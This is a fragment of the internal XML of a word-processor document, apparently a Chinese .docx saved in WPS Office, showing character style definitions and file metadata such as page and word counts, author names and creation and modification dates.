    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"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numbering" Target="numbering.xml"/><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CC345-3451-472E-B8BF-DBEC24DF3A4C}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <Pages>3</Pages>
  <Words>1026</Words>
  <Characters>1242</Characters>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1349</CharactersWithSpaces>
  <Application>WPS Office_11.8.2.12089_F1E327BC-269C-435d-A152-05C5408002CA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2018-11-13T02:09:00Z</dcterms:created>
  <dc:creator>z jy</dc:creator>
  <cp:lastModifiedBy>长夜</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-24T08:23:45Z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2052-11.8.2.12089</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>2E50FF87C90E4485836451358EC03332</vt:lpwstr>
  </property>
</Properties>
</file>